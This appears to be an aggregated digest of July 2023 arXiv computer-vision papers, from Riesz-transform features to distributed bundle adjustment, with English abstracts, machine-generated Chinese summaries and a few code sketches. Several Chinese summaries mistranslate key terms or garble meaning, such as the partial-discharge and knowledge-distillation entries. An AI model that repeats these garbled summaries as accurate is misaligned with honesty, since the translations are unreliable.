  • paper_url: http://arxiv.org/abs/2307.08467
  • repo_url: None
  • paper_authors: Tin Barisin, Jesus Angulo, Katja Schladitz, Claudia Redenbach
  • for: 文章主要提出一种基于里茨变换的特征表示方法,以避免对尺度维度进行采样,并且具有尺度等变性。
  • methods: 本文使用里茨变换定义了一种新的特征表示方法,并详细分析了这种表示方法的数学基础。这种表示方法具有尺度等变性,并且与传统的散射网络相比,特征数量减少为四分之一。
  • results: 作者通过纹理分类和数字分类两个任务进行实验,证明了该方法具有与散射网络相当的性能,并且在不同的尺度下保持稳定。特别是在训练数据中未包含的尺度下,该方法表现更好。
    Abstract Scattering networks yield powerful and robust hierarchical image descriptors which do not require lengthy training and which work well with very few training data. However, they rely on sampling the scale dimension. Hence, they become sensitive to scale variations and are unable to generalize to unseen scales. In this work, we define an alternative feature representation based on the Riesz transform. We detail and analyze the mathematical foundations behind this representation. In particular, it inherits scale equivariance from the Riesz transform and completely avoids sampling of the scale dimension. Additionally, the number of features in the representation is reduced by a factor four compared to scattering networks. Nevertheless, our representation performs comparably well for texture classification with an interesting addition: scale equivariance. Our method yields superior performance when dealing with scales outside of those covered by the training dataset. The usefulness of the equivariance property is demonstrated on the digit classification task, where accuracy remains stable even for scales four times larger than the one chosen for training. As a second example, we consider classification of textures.
    摘要 散射网络能生成强大且稳健的层次图像描述符,不需要长时间训练,并且只需非常少的训练数据。然而,它们依赖于对尺度维度的采样,因此对尺度变化十分敏感,无法泛化到未见过的尺度。在这项工作中,我们定义了一种基于Riesz变换的替代特征表示。我们详细介绍并分析了这种表示背后的数学基础。特别地,它从Riesz变换继承了尺度等变性,并完全避免了对尺度维度的采样。此外,与散射网络相比,该表示的特征数量减少为四分之一。尽管如此,我们的表示在纹理分类中表现相当,并带来一个有趣的附加特性:尺度等变性。当处理训练数据未覆盖的尺度时,我们的方法表现更优。等变性的用处在数字分类任务中得到了验证:即使尺度是训练所用尺度的四倍,准确率仍保持稳定。作为第二个例子,我们考虑了纹理分类任务。
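
As a worked illustration of the building block, the first-order Riesz transform of a 2D image can be computed in the Fourier domain as R_j f = F^{-1}[-i ξ_j / |ξ| · F f]. The NumPy sketch below is minimal and self-contained; the normalisation conventions and the higher-order transforms used in the full feature representation are omitted.

```python
import numpy as np

def riesz_transform(img):
    """First-order Riesz transform (R_x f, R_y f) of a 2D image.

    Implements R_j f = IFFT( -1j * xi_j / |xi| * FFT(f) ), which is
    scale-equivariant: rescaling the image rescales the response the
    same way, with no sampling of a scale axis.
    """
    h, w = img.shape
    fy = np.fft.fftfreq(h)[:, None]          # vertical frequencies xi_y
    fx = np.fft.fftfreq(w)[None, :]          # horizontal frequencies xi_x
    norm = np.sqrt(fx ** 2 + fy ** 2)
    norm[0, 0] = 1.0                         # avoid division by zero at DC
    F = np.fft.fft2(img)
    rx = np.real(np.fft.ifft2(-1j * fx / norm * F))
    ry = np.real(np.fft.ifft2(-1j * fy / norm * F))
    return rx, ry

# toy usage: responses to a vertical edge
edge = np.zeros((64, 64)); edge[:, 32:] = 1.0
rx, ry = riesz_transform(edge)
```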

Generalizable Classification of UHF Partial Discharge Signals in Gas-Insulated HVDC Systems Using Neural Networks

  • paper_url: http://arxiv.org/abs/2307.08466
  • repo_url: None
  • paper_authors: Steffen Seitz, Thomas Götz, Christopher Lindenberg, Ronald Tetzlaff, Stephan Schlegel
  • for: 本研究旨在提出一种基于神经网络的方法,用于分类HVDC GIS中的部分磁发(PD)信号,而不需要基于振荡序列分析特征。
  • methods: 本研究使用神经网络模型进行PD信号分类,并对时域和频域输入信号进行比较,以及不同Normalization方法的影响。
  • results: 研究结果表明,使用神经网络模型可以有效地分类PD信号,并且可以普适到不同的输入振荡频率和电压倍数。
    Abstract Undetected partial discharges (PDs) are a safety critical issue in high voltage (HV) gas insulated systems (GIS). While the diagnosis of PDs under AC voltage is well-established, the analysis of PDs under DC voltage remains an active research field. A key focus of these investigations is the classification of different PD sources to enable subsequent sophisticated analysis. In this paper, we propose and analyze a neural network-based approach for classifying PD signals caused by metallic protrusions and conductive particles on the insulator of HVDC GIS, without relying on pulse sequence analysis features. In contrast to previous approaches, our proposed model can discriminate the studied PD signals obtained at negative and positive potentials, while also generalizing to unseen operating voltage multiples. Additionally, we compare the performance of time- and frequency-domain input signals and explore the impact of different normalization schemes to mitigate the influence of free-space path loss between the sensor and defect location.

Domain Adaptation using Silver Standard Masks for Lateral Ventricle Segmentation in FLAIR MRI

  • paper_url: http://arxiv.org/abs/2307.08456
  • repo_url: None
  • paper_authors: Owen Crystal, Pejman J. Maralani, Sandra Black, Alan R. Moody, April Khademi
  • for: This paper presents a new method for segmenting lateral ventricular volume (LVV) in fluid-attenuated inversion recovery (FLAIR) MRI images.
  • methods: The proposed method uses transfer learning and domain adaptation to improve the accuracy of LVV segmentation. It uses a novel image processing algorithm to generate silver standard (SS) masks from the target domain, which are then used to supplement the gold standard (GS) data from the source domain.
  • results: The proposed method achieved the best and most consistent performance on four different datasets, with a mean Dice similarity coefficient (DSC) of 0.89 and a coefficient of variation (CoV) of 0.05. The method significantly outperformed the GS-only model on three target domains; the results suggest that pre-training with noisy labels from the target domain and fine-tuning with GS masks allows the model to adapt to dataset-specific characteristics while providing robust parameter initialization.
    Abstract Lateral ventricular volume (LVV) is an important biomarker for clinical investigation. We present the first transfer learning-based LVV segmentation method for fluid-attenuated inversion recovery (FLAIR) MRI. To mitigate covariate shifts between source and target domains, this work proposes an domain adaptation method that optimizes performance on three target datasets. Silver standard (SS) masks were generated from the target domain using a novel conventional image processing ventricular segmentation algorithm and used to supplement the gold standard (GS) data from the source domain, Canadian Atherosclerosis Imaging Network (CAIN). Four models were tested on held-out test sets from four datasets: 1) SS+GS: trained on target SS masks and fine-tuned on source GS masks, 2) GS+SS: trained on source GS masks and fine-tuned on target SS masks, 3) trained on source GS (GS CAIN Only) and 4) trained on target SS masks (SS Only). The SS+GS model had the best and most consistent performance (mean DSC = 0.89, CoV = 0.05) and showed significantly (p < 0.05) higher DSC compared to the GS-only model on three target domains. Results suggest pre-training with noisy labels from the target domain allows the model to adapt to the dataset-specific characteristics and provides robust parameter initialization while fine-tuning with GS masks allows the model to learn detailed features. This method has wide application to other medical imaging problems where labeled data is scarce, and can be used as a per-dataset calibration method to accelerate wide-scale adoption.
    摘要 “ lateral ventricular volume (LVV) 是一个重要的临床探险标的。本研究提出了首个基于传播学习的 LVV 分类方法,用于 fluido-attenuated inversion recovery (FLAIR) MRI。为了缓解对应领域的变化,这个工作提出了一个领域适应方法,将表达性提高到三个目标 dataset 上。silver standard (SS) mask 由目标领域中的一个新的传统影像处理方法生成,并用来补充来自源领域的 gold standard (GS) 数据,Canadian Atherosclerosis Imaging Network (CAIN)。我们测试了四个模型,分别是:1) SS+GS:在目标 SS masks 上练习并在源 GS masks 上精确化,2) GS+SS:在源 GS masks 上练习并在目标 SS masks 上精确化,3) 在源 GS (GS CAIN Only) 上练习,4) 在目标 SS masks (SS Only) 上练习。SS+GS 模型表现最好,其 mean DSC 为 0.89,CoV 为 0.05,并在三个目标领域中表现出最高的 DSC,并与 GS-only 模型在所有三个目标领域中有 statistically significant (p < 0.05) 的差异。结果显示,在目标领域的噪音标签上进行预训可以让模型适应到dataset-specific的特征,并提供了稳定的初始化,而精确化在目标 SS masks 上可以让模型学习更多的细部特征。这种方法可以广泛应用于医疗影像问题中,where labeled data 是稀有的,并可以用来加速广泛的采纳。”
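
The SS+GS recipe reduces to a two-phase schedule: pre-train on the noisy, target-domain silver-standard masks, then fine-tune on the source-domain gold-standard masks. The skeleton below is a hedged sketch of that schedule only; the loss, optimiser, learning-rate drop, and epoch counts are placeholders, not the authors' configuration.

```python
import torch

def train_ss_gs(model, ss_loader, gs_loader, ss_epochs=50, gs_epochs=50, lr=1e-4):
    """SS+GS schedule (sketch): noisy target-domain pre-training,
    then gold-standard fine-tuning with an assumed smaller learning rate."""
    opt = torch.optim.Adam(model.parameters(), lr=lr)
    loss_fn = torch.nn.BCEWithLogitsLoss()       # placeholder segmentation loss

    def run(loader, epochs):
        model.train()
        for _ in range(epochs):
            for img, mask in loader:
                opt.zero_grad()
                loss = loss_fn(model(img), mask)
                loss.backward()
                opt.step()

    run(ss_loader, ss_epochs)                    # phase 1: silver-standard masks (target domain)
    for g in opt.param_groups:                   # assumption: reduce LR for fine-tuning
        g["lr"] = lr * 0.1
    run(gs_loader, gs_epochs)                    # phase 2: gold-standard masks (source domain)
    return model
```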

Not All Steps are Created Equal: Selective Diffusion Distillation for Image Manipulation

  • paper_url: http://arxiv.org/abs/2307.08448
  • repo_url: https://github.com/andysonys/selective-diffusion-distillation
  • paper_authors: Luozhou Wang, Shuai Yang, Shu Liu, Ying-cong Chen
  • for: 提高图像修改任务中的精度和可修改性
  • methods: 提出了一种新的框架 Selective Diffusion Distillation (SDD),通过训练一个Feedforward图像修改网络,以及一个有效的时间步选择器,使得图像修改任务中精度和可修改性同时得到提高。
  • results: 经验证明,该框架可以成功解决图像修改任务中的质量与可修改性之间的衡量问题,并且在多个任务上达到了优秀的效果。
    Abstract Conditional diffusion models have demonstrated impressive performance in image manipulation tasks. The general pipeline involves adding noise to the image and then denoising it. However, this method faces a trade-off problem: adding too much noise affects the fidelity of the image while adding too little affects its editability. This largely limits their practical applicability. In this paper, we propose a novel framework, Selective Diffusion Distillation (SDD), that ensures both the fidelity and editability of images. Instead of directly editing images with a diffusion model, we train a feedforward image manipulation network under the guidance of the diffusion model. Besides, we propose an effective indicator to select the semantic-related timestep to obtain the correct semantic guidance from the diffusion model. This approach successfully avoids the dilemma caused by the diffusion process. Our extensive experiments demonstrate the advantages of our framework. Code is released at https://github.com/AndysonYs/Selective-Diffusion-Distillation.
    摘要 条件扩散模型在图像编辑任务中表现出色。通常的流程是先在图像上添加噪声,然后再去噪。然而,这种方法面临一个权衡问题:添加过多噪声会影响图像的保真度,而添加过少噪声则会影响其可编辑性。这在很大程度上限制了它们的实际应用。在这篇论文中,我们提出了一个新的框架,即选择性扩散蒸馏(SDD),以同时保证图像的保真度和可编辑性。我们不直接用扩散模型编辑图像,而是在扩散模型的指导下训练一个前馈图像编辑网络。此外,我们提出了一个有效的指标来选择与语义相关的时间步,从而从扩散模型中获得正确的语义指导。这种方法成功避免了扩散过程带来的两难问题。我们的大量实验表明了该框架的优势。代码发布在 https://github.com/AndysonYs/Selective-Diffusion-Distillation。

DOT: A Distillation-Oriented Trainer

  • paper_url: http://arxiv.org/abs/2307.08436
  • repo_url: None
  • paper_authors: Borui Zhao, Quan Cui, Renjie Song, Jiajun Liang
  • for: 本研究旨在提高知识传播过程中学生模型的优化属性,以提高模型的泛化能力。
  • methods: 本研究使用了知识传播策略,并增加了精益损失来加速学生模型的优化。
  • results: 实验表明,使用 Distillation-Oriented Trainer (DOT) 可以破坏知识传播中的负面交互,并提高学生模型的泛化能力。 DOT 在 ImageNet-1k 上 Achieves a +2.59% accuracy improvement for the ResNet50-MobileNetV1 pair.
    Abstract Knowledge distillation transfers knowledge from a large model to a small one via task and distillation losses. In this paper, we observe a trade-off between task and distillation losses, i.e., introducing distillation loss limits the convergence of task loss. We believe that the trade-off results from the insufficient optimization of distillation loss. The reason is: The teacher has a lower task loss than the student, and a lower distillation loss drives the student more similar to the teacher, then a better-converged task loss could be obtained. To break the trade-off, we propose the Distillation-Oriented Trainer (DOT). DOT separately considers gradients of task and distillation losses, then applies a larger momentum to distillation loss to accelerate its optimization. We empirically prove that DOT breaks the trade-off, i.e., both losses are sufficiently optimized. Extensive experiments validate the superiority of DOT. Notably, DOT achieves a +2.59% accuracy improvement on ImageNet-1k for the ResNet50-MobileNetV1 pair. Conclusively, DOT greatly benefits the student's optimization properties in terms of loss convergence and model generalization. Code will be made publicly available.
    摘要 知识塑化是将知识从大模型传递到小模型的过程,通过任务和塑化损失来实现。在这篇论文中,我们观察到任务损失和塑化损失之间存在负面关系,即在引入塑化损失时,任务损失的收敛被限制。我们认为这种负面关系的原因是塑化损失的优化不充分。理由是:教师模型的任务损失低于学生模型,且塑化损失驱动学生模型更加相似于教师模型,然后可以获得更好的任务损失收敛。为解决这种负面关系,我们提出了塑化导向训练器(DOT)。DOT分别考虑了任务和塑化损失的梯度,然后将塑化损失的梯度应用更大的滚动矩阵,以加速其优化。我们经验证明,DOT可以破坏这种负面关系,即任务损失和塑化损失都得到了足够的优化。广泛的实验证明了DOT的优越性。特别是,DOT在ImageNet-1k上为ResNet50-MobileNetV1对得到了+2.59%的准确率提升。结论是,DOT对学生模型的优化质量有着很大的改善,包括损失收敛和模型泛化。代码将公开发布。
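
The key mechanic, separate momentum buffers for the task and distillation gradients with a larger momentum on the latter, fits in a few lines of PyTorch. The momentum values and the plain-SGD update below are assumptions for illustration; `buf_task` and `buf_kd` are ordinary dicts that persist across iterations.

```python
import torch

def dot_step(params, task_loss, kd_loss, buf_task, buf_kd,
             lr=0.1, m_task=0.9, m_kd=0.99):
    """One DOT-style update (sketch): the task and distillation losses get
    their own momentum buffers, and the larger momentum (m_kd > m_task)
    accelerates optimization along the distillation direction."""
    g_task = torch.autograd.grad(task_loss, params, retain_graph=True)
    g_kd = torch.autograd.grad(kd_loss, params)
    with torch.no_grad():
        for p, gt, gk in zip(params, g_task, g_kd):
            buf_task[p] = m_task * buf_task.get(p, torch.zeros_like(p)) + gt
            buf_kd[p] = m_kd * buf_kd.get(p, torch.zeros_like(p)) + gk
            p.add_(buf_task[p] + buf_kd[p], alpha=-lr)
```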

Dense Affinity Matching for Few-Shot Segmentation

  • paper_url: http://arxiv.org/abs/2307.08434
  • repo_url: None
  • paper_authors: Hao Chen, Yonghan Dong, Zheming Lu, Yunlong Yu, Yingming Li, Jungong Han, Zhongfei Zhang
  • for: 这篇论文目的是提出一个几shot segmentation(FSS)方法,用于分类新的图像类型,只需要几个标注类别的数据。
  • methods: 这篇论文提出了一个紧密的相似性匹配(DAM)框架,通过密集的Pixel-to-Pixel和Pixel-to-Patch关系捕捉,以及对应的3D潜在神经网络,实现了支持-询问的互动。
  • results: 实验结果显示,DAM在十个benchmark上的性能很竞争,特别是在跨类、跨数据和跨领域的FSS任务中,仅需0.68M个parameters,表明DAM的效iveness和效率。
    Abstract Few-Shot Segmentation (FSS) aims to segment the novel class images with a few annotated samples. In this paper, we propose a dense affinity matching (DAM) framework to exploit the support-query interaction by densely capturing both the pixel-to-pixel and pixel-to-patch relations in each support-query pair with the bidirectional 3D convolutions. Different from the existing methods that remove the support background, we design a hysteretic spatial filtering module (HSFM) to filter the background-related query features and retain the foreground-related query features with the assistance of the support background, which is beneficial for eliminating interference objects in the query background. We comprehensively evaluate our DAM on ten benchmarks under cross-category, cross-dataset, and cross-domain FSS tasks. Experimental results demonstrate that DAM performs very competitively under different settings with only 0.68M parameters, especially under cross-domain FSS tasks, showing its effectiveness and efficiency.
    摘要 几个示例图像分割(FSS)目标是将新类图像分割成几个示例图像。在这篇论文中,我们提出了密集相似匹配(DAM)框架,利用支持Query的互动来密集捕捉每个支持Query对的像素到像素和像素到补做的关系,使用双向三维卷积来实现。与现有方法不同的是,我们设计了一种弹性空间筛选模块(HSFM),用于筛选查询背景相关的特征,保留查询背景相关的特征,以帮助消除查询背景中的干扰对象。我们在十个benchmark上进行了广泛的评估,包括跨类、跨数据集和跨领域的FSS任务。实验结果表明,DAM在不同的设置下表现非常竞争力,特别是在跨领域FSS任务中,表明其效果和效率。

Divide&Classify: Fine-Grained Classification for City-Wide Visual Place Recognition

  • paper_url: http://arxiv.org/abs/2307.08417
  • repo_url: https://github.com/ga1i13o/Divide-and-Classify
  • paper_authors: Gabriele Trivigno, Gabriele Berton, Carlo Masone, Juan Aragon, Barbara Caputo
  • for: 本研究旨在解决Visual Place recognition问题,即图像检索问题。
  • methods: 本研究使用分类方法,而不是传统的相似性搜索方法,以减少计算时间。
  • results: 研究提出了一种新的分类方法,称为Divide&Classify(D&C),可以快速和准确地进行计算,并且与现有的检索方法结合使用可以提高计算速度。
    Abstract Visual Place recognition is commonly addressed as an image retrieval problem. However, retrieval methods are impractical to scale to large datasets, densely sampled from city-wide maps, since their dimension impact negatively on the inference time. Using approximate nearest neighbour search for retrieval helps to mitigate this issue, at the cost of a performance drop. In this paper we investigate whether we can effectively approach this task as a classification problem, thus bypassing the need for a similarity search. We find that existing classification methods for coarse, planet-wide localization are not suitable for the fine-grained and city-wide setting. This is largely due to how the dataset is split into classes, because these methods are designed to handle a sparse distribution of photos and as such do not consider the visual aliasing problem across neighbouring classes that naturally arises in dense scenarios. Thus, we propose a partitioning scheme that enables a fast and accurate inference, preserving a simple learning procedure, and a novel inference pipeline based on an ensemble of novel classifiers that uses the prototypes learned via an angular margin loss. Our method, Divide&Classify (D&C), enjoys the fast inference of classification solutions and an accuracy competitive with retrieval methods on the fine-grained, city-wide setting. Moreover, we show that D&C can be paired with existing retrieval pipelines to speed up computations by over 20 times while increasing their recall, leading to new state-of-the-art results.
    摘要 通常情况下,视觉地点识别被视为一个图像检索问题。然而,检索方法在大量数据集上是不可行的,因为它们的维度会导致推断时间增加。使用近似最似 neighboor search 进行检索可以减轻这个问题,但是会导致性能下降。在这篇论文中,我们研究了是否可以通过将这个任务转化为一个分类问题,从而减少需要的相似性检索。我们发现现有的分类方法不适用于细致的城市范围内的地点识别任务,主要是因为数据集被分成的类别不适合处理稠密的场景中的视觉假设问题。因此,我们提出了一种分类方案,即 Divide&Classify (D&C),它可以快速和准确地进行推断,同时保持简单的学习过程。此外,我们还提出了一种新的推断管线,基于一个 ensemble 的新分类器,使用学习 angular margin loss 的抽象。我们的方法 D&C 可以快速地进行分类,并且与现有的检索管线结合使用可以提高计算速度,从而实现新的领先结果。
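
D&C learns class prototypes with an angular margin loss. The paper does not pin down the exact variant here, so the sketch below uses the widely known ArcFace-style formulation as one concrete instance; the scale `s` and margin `m` are assumed values.

```python
import torch
import torch.nn.functional as F

def angular_margin_loss(features, labels, prototypes, s=30.0, m=0.3):
    """ArcFace-style angular margin loss over learned class prototypes.

    features:   [B, D] image embeddings
    prototypes: [K, D] one learnable prototype per geographic class
    """
    f = F.normalize(features, dim=1)
    w = F.normalize(prototypes, dim=1)
    cos = f @ w.t()                                      # [B, K] cosine similarity
    theta = torch.acos(cos.clamp(-1 + 1e-7, 1 - 1e-7))
    target = F.one_hot(labels, num_classes=w.size(0)).bool()
    logits = torch.where(target, torch.cos(theta + m), cos) * s
    return F.cross_entropy(logits, labels)
```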

Monocular 3D Object Detection with LiDAR Guided Semi Supervised Active Learning

  • paper_url: http://arxiv.org/abs/2307.08415
  • repo_url: None
  • paper_authors: Aral Hekimoglu, Michael Schmidt, Alvaro Marcos-Ramiro
  • for: 这个论文旨在提出一种基于 semi-supervised active learning 的精灵活的 LiDAR 引导的单目3D对象检测框架 (MonoLiG),以利用收集的所有数据模式进行模型开发。
  • methods: 论文使用 LiDAR 作为指导,在训练单目3D检测器时不添加任何执行阶段的开销。在训练中,我们利用 LiDAR 教师和单目学生跨模态批处理法从 semi-supervised learning 中提取不标注数据中的信息作为 Pseudo-labels。
  • results: 我们的选择策略可以在 KITTI 和 Waymo 数据集上广泛地实现,并且在 state-of-the-art active learning 基础上减少标注成本至少 17%。我们的训练策略在 KITTI 3D 和 birds-eye-view (BEV) 单目对象检测官方 benchmark 中获得了前一名,提高了 BEV 平均准确率 (AP) 2.02。
    Abstract We propose a novel semi-supervised active learning (SSAL) framework for monocular 3D object detection with LiDAR guidance (MonoLiG), which leverages all modalities of collected data during model development. We utilize LiDAR to guide the data selection and training of monocular 3D detectors without introducing any overhead in the inference phase. During training, we leverage the LiDAR teacher, monocular student cross-modal framework from semi-supervised learning to distill information from unlabeled data as pseudo-labels. To handle the differences in sensor characteristics, we propose a data noise-based weighting mechanism to reduce the effect of propagating noise from LiDAR modality to monocular. For selecting which samples to label to improve the model performance, we propose a sensor consistency-based selection score that is also coherent with the training objective. Extensive experimental results on KITTI and Waymo datasets verify the effectiveness of our proposed framework. In particular, our selection strategy consistently outperforms state-of-the-art active learning baselines, yielding up to 17% better saving rate in labeling costs. Our training strategy attains the top place in KITTI 3D and birds-eye-view (BEV) monocular object detection official benchmarks by improving the BEV Average Precision (AP) by 2.02.
    摘要 我们提出了一种新的半监督学习框架(SSAL),用于单目3D物体检测,利用了所有数据收集时的模式。我们使用激光准备数据选择和训练单目3D检测器,无需在检测阶段添加任何负担。在训练过程中,我们利用激光师,单目学生交叉模式自动学习法从无标签数据中提取信息,作为pseudo标签。为了处理感知器特征的差异,我们提议一种数据噪音基于权重机制,以减少激光模式噪音对单目检测器的影响。为选择需要标注的样本以提高模型性能,我们提议一种感知器一致性基于选择分数,与训练目标含义一致。我们的选择策略在KITTI和Waymo数据集上进行了广泛的实验,并证明了我们的提议的有效性。特别是,我们的选择策略在活动学习基elines上一直保持状态的最佳,可以在KITTI 3D和bird's-eye-view(BEV)单目物体检测官方benchmark中提高BEV均值精度(AP)by 2.02。

Active Learning for Object Detection with Non-Redundant Informative Sampling

  • paper_url: http://arxiv.org/abs/2307.08414
  • repo_url: None
  • paper_authors: Aral Hekimoglu, Adrian Brucker, Alper Kagan Kayali, Michael Schmidt, Alvaro Marcos-Ramiro
  • for: 提高2D对象检测器的性能,建立一个有代表性和多样性的数据集
  • methods: 使用不同样本之间的差异和不确定性来选择样本,并计算样本集中样本之间的信息共同分数
  • results: 比Random选择更高效,可以减少标注成本20%和30%,并且可以建立多样化的对象类型、形状和角度的数据集
    Abstract Curating an informative and representative dataset is essential for enhancing the performance of 2D object detectors. We present a novel active learning sampling strategy that addresses both the informativeness and diversity of the selections. Our strategy integrates uncertainty and diversity-based selection principles into a joint selection objective by measuring the collective information score of the selected samples. Specifically, our proposed NORIS algorithm quantifies the impact of training with a sample on the informativeness of other similar samples. By exclusively selecting samples that are simultaneously informative and distant from other highly informative samples, we effectively avoid redundancy while maintaining a high level of informativeness. Moreover, instead of utilizing whole image features to calculate distances between samples, we leverage features extracted from detected object regions within images to define object features. This allows us to construct a dataset encompassing diverse object types, shapes, and angles. Extensive experiments on object detection and image classification tasks demonstrate the effectiveness of our strategy over the state-of-the-art baselines. Specifically, our selection strategy achieves a 20% and 30% reduction in labeling costs compared to random selection for PASCAL-VOC and KITTI, respectively.
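
The selection rule, pick samples that are informative yet distant from other highly informative samples already chosen, can be expressed as a short greedy loop over object-level features. NORIS's actual joint information score differs; the trade-off below (informativeness minus a similarity penalty, with weight `lam`) is a hedged approximation.

```python
import numpy as np

def select_non_redundant(info_scores, obj_feats, budget, lam=1.0):
    """Greedy acquisition (sketch): maximise informativeness while
    penalising similarity to object features of already-chosen samples.

    info_scores: [N] numpy array of per-image informativeness (e.g., uncertainty)
    obj_feats:   [N, D] mean feature of detected object regions per image
    """
    feats = obj_feats / (np.linalg.norm(obj_feats, axis=1, keepdims=True) + 1e-8)
    selected = []
    for _ in range(budget):
        if selected:
            sim = feats @ feats[selected].T              # cosine similarity to picks
            redundancy = sim.max(axis=1)
        else:
            redundancy = np.zeros(len(info_scores))
        score = info_scores - lam * redundancy
        score[selected] = -np.inf                        # never re-pick a sample
        selected.append(int(score.argmax()))
    return selected
```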

CLIP-Guided StyleGAN Inversion for Text-Driven Real Image Editing

  • paper_url: http://arxiv.org/abs/2307.08397
  • repo_url: https://github.com/johnberg1/CLIPInverter
  • paper_authors: Ahmet Canberk Baykal, Abdul Basit Anees, Duygu Ceylan, Erkut Erdem, Aykut Erdem, Deniz Yuret
  • for: 用于实现基于自然语言描述的图像编辑
  • methods: 使用 StyleGAN 模型和 CLIP embedding 进行图像编辑,并使用 novel 的文本条件 adapter 层来实现多属性变化
  • results: 比其他方法更高效和精准地完成多属性变化,并且在不同领域(人脸、猫、鸟等)表现出更高的推理精度和图像真实性
    Abstract Researchers have recently begun exploring the use of StyleGAN-based models for real image editing. One particularly interesting application is using natural language descriptions to guide the editing process. Existing approaches for editing images using language either resort to instance-level latent code optimization or map predefined text prompts to some editing directions in the latent space. However, these approaches have inherent limitations. The former is not very efficient, while the latter often struggles to effectively handle multi-attribute changes. To address these weaknesses, we present CLIPInverter, a new text-driven image editing approach that is able to efficiently and reliably perform multi-attribute changes. The core of our method is the use of novel, lightweight text-conditioned adapter layers integrated into pretrained GAN-inversion networks. We demonstrate that by conditioning the initial inversion step on the CLIP embedding of the target description, we are able to obtain more successful edit directions. Additionally, we use a CLIP-guided refinement step to make corrections in the resulting residual latent codes, which further improves the alignment with the text prompt. Our method outperforms competing approaches in terms of manipulation accuracy and photo-realism on various domains including human faces, cats, and birds, as shown by our qualitative and quantitative results.

Revisiting Scene Text Recognition: A Data Perspective

  • paper_url: http://arxiv.org/abs/2307.08723
  • repo_url: https://github.com/Mountchicken/Union14M
  • paper_authors: Qing Jiang, Jiapeng Wang, Dezhi Peng, Chongyu Liu, Lianwen Jin
  • for: 本研究旨在从数据驱动的角度重新评估场景文本识别(STR)。
  • methods: 我们首先回顾了场景文本识别领域的六个常用标准 benchmark,并发现了性能饱和现象,即仅有2.91%的标准图像无法由13种表征模型准确识别。
  • results: 我们的实验表明,13种模型在400万个标注图像上的平均准确率只有66.53%, indicating that STR still faces numerous challenges in real-world scenarios。
    Abstract This paper aims to re-assess scene text recognition (STR) from a data-oriented perspective. We begin by revisiting the six commonly used benchmarks in STR and observe a trend of performance saturation, whereby only 2.91% of the benchmark images cannot be accurately recognized by an ensemble of 13 representative models. While these results are impressive and suggest that STR could be considered solved, however, we argue that this is primarily due to the less challenging nature of the common benchmarks, thus concealing the underlying issues that STR faces. To this end, we consolidate a large-scale real STR dataset, namely Union14M, which comprises 4 million labeled images and 10 million unlabeled images, to assess the performance of STR models in more complex real-world scenarios. Our experiments demonstrate that the 13 models can only achieve an average accuracy of 66.53% on the 4 million labeled images, indicating that STR still faces numerous challenges in the real world. By analyzing the error patterns of the 13 models, we identify seven open challenges in STR and develop a challenge-driven benchmark consisting of eight distinct subsets to facilitate further progress in the field. Our exploration demonstrates that STR is far from being solved and leveraging data may be a promising solution. In this regard, we find that utilizing the 10 million unlabeled images through self-supervised pre-training can significantly improve the robustness of STR model in real-world scenarios and leads to state-of-the-art performance.
    摘要 这篇论文旨在从数据驱动的角度重新评估场景文本识别(STR)。我们首先回顾了常用的六个STR benchmark,并观察到性能饱和的趋势:只有2.91%的benchmark图像无法被13种代表性模型的集成准确识别。虽然这些结果令人印象深刻,似乎表明STR可以被视为已解决,但我们认为这主要归因于常用benchmark难度较低,从而掩盖了STR实际面临的问题。为此,我们整合了大规模的实际STR数据集,即Union14M,该数据集包括400万标注图像和1000万无标注图像,以评估STR模型在更复杂的实际场景中的性能。我们的实验表明,13种模型在400万标注图像上的平均准确率只有66.53%,表明STR在实际场景中仍面临许多挑战。通过分析13种模型的错误模式,我们确定了STR中的七个开放挑战,并构建了一个由八个不同子集组成的挑战驱动benchmark,以促进该领域的进一步发展。我们的探索表明,STR远未被解决,而利用数据可能是一个有希望的解决方案。在这方面,我们发现通过对1000万无标注图像进行自监督预训练,可以显著改善STR模型在实际场景中的鲁棒性,并达到最先进的性能。

Dynamic Snake Convolution based on Topological Geometric Constraints for Tubular Structure Segmentation

  • paper_url: http://arxiv.org/abs/2307.08388
  • repo_url: https://github.com/yaoleiqi/dscnet
  • paper_authors: Yaolei Qi, Yuting He, Xiaoming Qi, Yuan Zhang, Guanyu Yang
  • for: 这项研究旨在提高血管、道路等管状结构分割任务中的准确性和效率。
  • methods: 该研究使用动态蛇形卷积(dynamic snake convolution)来准确捕捉管状结构的特征,并提出多视角特征融合策略,以保留来自多种全局形态的重要信息。
  • results: 实验表明,DSCNet 在 2D 和 3D 数据集上都能提供比常见方法更高的准确性和连续性。
    Abstract Accurate segmentation of topological tubular structures, such as blood vessels and roads, is crucial in various fields, ensuring accuracy and efficiency in downstream tasks. However, many factors complicate the task, including thin local structures and variable global morphologies. In this work, we note the specificity of tubular structures and use this knowledge to guide our DSCNet to simultaneously enhance perception in three stages: feature extraction, feature fusion, and loss constraint. First, we propose a dynamic snake convolution to accurately capture the features of tubular structures by adaptively focusing on slender and tortuous local structures. Subsequently, we propose a multi-view feature fusion strategy to complement the attention to features from multiple perspectives during feature fusion, ensuring the retention of important information from different global morphologies. Finally, a continuity constraint loss function, based on persistent homology, is proposed to constrain the topological continuity of the segmentation better. Experiments on 2D and 3D datasets show that our DSCNet provides better accuracy and continuity on the tubular structure segmentation task compared with several methods. Our codes will be publicly available.

Distributed bundle adjustment with block-based sparse matrix compression for super large scale datasets

  • paper_url: http://arxiv.org/abs/2307.08383
  • repo_url: https://github.com/MozartZheng/DistributedBA
  • paper_authors: Maoteng Zheng, Nengcheng Chen, Junfeng Zhu, Xiaoru Zeng, Huanbin Qiu, Yuyao Jiang, Xingyue Lu, Hao Qu
  • for: 这篇论文主要是为了解决大规模数据集中的摄像头系统Bundle Adjustment(BA)问题。
  • methods: 该方法使用精确的Levenberg-Marquardt(LM)算法来实现分布式摄像头系统(DBA),而不是使用估计算法来适应平行框架。它还使用块基于稀疏矩阵压缩格式(BSMC)来压缩大规模的摄像头系统(RCS),以便分布式存储和更新。
  • results: 评估和比较表明,该方法在各种数据集上展现出高效的内存使用和广泛的可扩展性,优于基线方法。我们首次在分布式计算系统上使用LM算法对真实数据集(118万张图像)和合成数据集(1000万张图像,约为现有最先进的基于LM的BA所处理规模的500倍)进行了并行束调整。
